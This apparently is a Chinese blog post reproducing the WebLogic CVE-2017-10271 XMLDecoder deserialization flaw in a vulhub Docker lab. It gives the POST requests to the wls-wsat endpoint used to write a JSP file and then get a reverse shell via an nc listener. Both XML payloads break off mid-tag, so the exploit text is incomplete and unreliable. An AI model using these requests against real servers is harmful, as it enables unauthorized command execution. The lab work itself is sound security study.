Weblogic的WLS Security组件对外提供webservice服务，其中使用了XMLDecoder来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。[1] 这个实验有2部分，先上传文件，然后反弹shell。

前提：准备好docker环境，下载好vulhub，进入目录 ，开始复现漏洞

docker-compose build //可选docker-compose up -d

完成试验后，记得删除漏洞环境哦～～

docker-compose downdocker system prune -a -f //可选

简单访问一下，出现404，说明Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞（CVE-2017-10271）环境搭建成功了

先掏出burpsuite尝试写入一个文件

POST /wls-wsat/CoordinatorPortType HTTP/1.1Host: 144.34.162.13:7001Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: text/xmlContent-Length: 638<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java><java version="1.4.0">

访问这个文件

http://144.34.162.13:7001/bea_wls_internal/test.jsp

再来反弹shell，先在另一台机器上开启nc监听，然后掏出burpsuite构造POST请求

POST /wls-wsat/CoordinatorPortType HTTP/1.1Host: 144.34.162.13:7001Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: text/xmlContent-Length: 637<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.4.0">send请求，观察得到一个HTTP响应码500的返回包

在另一台机器上可以看到反弹shell成功了

参考^Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞（CVE-2017-10271） https://vulhub.org/#/environments/weblogic/CVE-2017-10271/

发布于 2023-10-01 14:29・IP 属地美国